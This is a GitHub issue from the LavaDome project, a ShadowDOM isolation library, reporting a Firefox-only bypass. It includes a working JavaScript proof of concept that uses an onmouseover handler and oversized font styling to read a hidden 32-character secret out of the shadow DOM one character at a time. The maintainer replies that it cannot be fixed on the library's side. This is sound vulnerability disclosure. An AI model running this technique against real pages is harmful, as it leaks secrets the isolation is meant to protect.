search

LavaMoat / LavaDome

Secure DOM trees isolation and encapsulation leveraging ShadowDOM
https://lavamoat.github.io/LavaDome/packages/core/demo/
MIT License
16 stars 3 forks source link

LavaDome is vulnerable to onmouseover #37

Open weizman opened 2 months ago

weizman commented 2 months ago

Another one by @masatokinugawa (FF only):

let foundChars = "";
PRIVATE.onmouseover = e => {
  const originalTarget = e.originalTarget;
  const host = originalTarget.parentNode.host;
  if (host && Array.from(host.parentElement.children).indexOf(host) === 0) {
    foundChars += originalTarget.innerText;
    console.log(foundChars);
    if (foundChars.length === 32) {
      alert(foundChars);
    }
    host.remove();
  }
}
PRIVATE.style.position = "absolute";
PRIVATE.style.top = "0";
PRIVATE.style.left = "0";
PRIVATE.style.padding = "0";
PRIVATE.style.margin = "0";
PRIVATE.style.fontFamily = "Consolas";
PRIVATE.style.letterSpacing = "100vw";
PRIVATE.style.fontSize = "100vw";
weizman commented 3 days ago

Can't think of a solution for this one, Firefox seem to insist on leaking information from within shadowDOMs through funnels I can't seem to understand. This one, like #15, really requires Firefox to adjust themselves for LavaDome to become secure against this.